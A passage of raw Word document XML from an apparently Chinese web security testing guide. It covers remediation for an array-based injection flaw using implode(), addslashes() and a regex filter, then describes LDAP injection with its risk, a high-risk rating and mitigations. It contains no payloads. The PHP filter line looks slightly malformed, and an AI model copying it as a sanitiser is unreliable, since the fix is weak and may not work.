        <w:t>注入，无论是否能够爆出数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE19353" w14:textId="77777777" w:rsidR="00B1139F" w:rsidRDefault="001A7A0B" w:rsidP="00553DC3">
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00FC4779" w:rsidRPr="00B1139F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止数组中的运算操作</w:t>
      </w:r>
      <w:r w:rsidR="00B1139F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可防御该漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00FC4779" w:rsidRPr="00B1139F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00B1139F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用一下两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E55A0" w14:textId="1AC5096B" w:rsidR="00FC4779" w:rsidRPr="001365A8" w:rsidRDefault="001365A8" w:rsidP="00553DC3">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidR="00FC4779" w:rsidRPr="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>implode()</w:t>
      </w:r>
      <w:r w:rsidR="00FC4779" w:rsidRPr="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277CA2A" w14:textId="4E01E1EE" w:rsidR="00FC4779" w:rsidRPr="00FC4779" w:rsidRDefault="00FC4779" w:rsidP="00553DC3">
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4779">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F52EF58" wp14:editId="55033F31">
            <wp:extent cx="5283200" cy="1968500"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="100" name="图片 100" descr="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片3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7553"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52832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60884797" w14:textId="77777777" w:rsidR="001365A8" w:rsidRDefault="00FC4779" w:rsidP="00553DC3">
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396344">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>implode()</w:t>
      </w:r>
      <w:r w:rsidR="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数返回由数组元素组合成的字符串。这样</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4779">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就只能得到一个</w:t>
      </w:r>
      <w:r w:rsidR="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C0CF0" w14:textId="2062B7DB" w:rsidR="00FC4779" w:rsidRPr="00FC4779" w:rsidRDefault="00FC4779" w:rsidP="00B76ACF">
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4779">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BB4EB0B" wp14:editId="3DBFBC51">
            <wp:extent cx="5283200" cy="1320800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 31" descr="片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片3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591"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52832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78D945C0" w14:textId="0916A53F" w:rsidR="00FC4779" w:rsidRPr="001365A8" w:rsidRDefault="00FC4779" w:rsidP="00553DC3">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00686E85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r w:rsidR="002C56FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，这样攻击者便不能破坏查询语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。同时，</w:t>
      </w:r>
      <w:r w:rsidR="002C56FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以</w:t>
      </w:r>
      <w:r w:rsidRPr="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用正则表达式把一些特殊符号替换掉</w:t>
      </w:r>
      <w:r w:rsidR="002C56FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r w:rsidRPr="001365A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用如下正则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255CC8A" w14:textId="77777777" w:rsidR="00FC4779" w:rsidRPr="00FC4779" w:rsidRDefault="00FC4779" w:rsidP="00553DC3">
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4779">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>$u_name =preg_replace(‘/[^a-z0-9]/i’, ‘\’, $_GET[‘u_name’]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47459AFB" w14:textId="08928710" w:rsidR="00A944EF" w:rsidRDefault="00FC4779" w:rsidP="00FA4349">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4779">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A9EA4D" wp14:editId="4A0D4115">
            <wp:extent cx="5270500" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="30" name="图片 30" descr="片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片39.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9653"/>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6AC36373" w14:textId="64CB2F88" w:rsidR="00B76ACF" w:rsidRPr="00FA4349" w:rsidRDefault="00B76ACF" w:rsidP="00B76ACF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="199"/>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F571BDC" w14:textId="1B2873A9" w:rsidR="001A7A0B" w:rsidRPr="00F757E4" w:rsidRDefault="001A7A0B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc498434559"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="41E6E709" w14:textId="6252C8D0" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="001A7A0B" w:rsidP="002A7E8B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00DB2D54" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>LDAP(Lightweight Directory Access Protocol)</w:t>
      </w:r>
      <w:r w:rsidR="00DB2D54" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，轻量级目录访问协议，是一种在线目录访问协议，主要用于目录中资源的搜索和查询</w:t>
      </w:r>
      <w:r w:rsidR="00DB2D54" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在用户可控制的输入中没有对</w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP </w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法进行除去或引用，那么生成的</w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP </w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询可能会导致将这些输入解释为</w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP </w:t>
      </w:r>
      <w:r w:rsidR="008E17EE" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是普通用户数据。这可用于修改查询逻辑以绕过安全性检查，或者插入其他用于修改后端数据库的语句，可能包括执行系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A2826" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="001A7A0B" w:rsidP="002A7E8B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C231884" w14:textId="56363233" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="00745544" w:rsidP="002A7E8B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可参考</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.moonsec.com/post-296.html</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DBAD52" w14:textId="1942D48C" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="00C24790" w:rsidP="002A7E8B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F823A5" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00F823A5" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidR="00F823A5" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入技术的关键在于控制用于目录搜索服务的过滤器。使用这些技术，攻击者可能直接访问</w:t>
      </w:r>
      <w:r w:rsidR="00F823A5" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidR="00F823A5" w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录树下的数据库，及重要的公司信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94E302" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="001A7A0B" w:rsidP="002A7E8B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D56A64" w14:textId="32313FBB" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="007344AB" w:rsidP="006E0566">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F4DAD" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="002A7E8B" w:rsidRDefault="001A7A0B" w:rsidP="002A7E8B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20713437" w14:textId="282E9DF0" w:rsidR="00007D28" w:rsidRPr="002A7E8B" w:rsidRDefault="00007D28" w:rsidP="002A7E8B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用不允许此弱点出现的经过审核的库或框架，或提供更容易避免此弱点的构造。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBCA19" w14:textId="77777777" w:rsidR="00007D28" w:rsidRPr="002A7E8B" w:rsidRDefault="00007D28" w:rsidP="002A7E8B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使用自动实施数据和代码之间的分离的结构化机制。这些机制也许能够自动提供相关引</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>用、编码和验证，而不是依赖于开发者在生成输出的每一处提供此能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDE042" w14:textId="77777777" w:rsidR="00007D28" w:rsidRPr="002A7E8B" w:rsidRDefault="00007D28" w:rsidP="002A7E8B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使用完成必要任务所需的最低特权来运行代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC30D4" w14:textId="469B56BB" w:rsidR="00007D28" w:rsidRPr="002A7E8B" w:rsidRDefault="00007D28" w:rsidP="002A7E8B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>如果在有风险的情况下仍需要使用动态生成的查询字符串或命令，</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>对参数正确地加引号并将这些参数中的任何特殊字符转义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3A0A8" w14:textId="375A19AD" w:rsidR="001A7A0B" w:rsidRDefault="00007D28" w:rsidP="002A7E8B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>接受已知善意</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
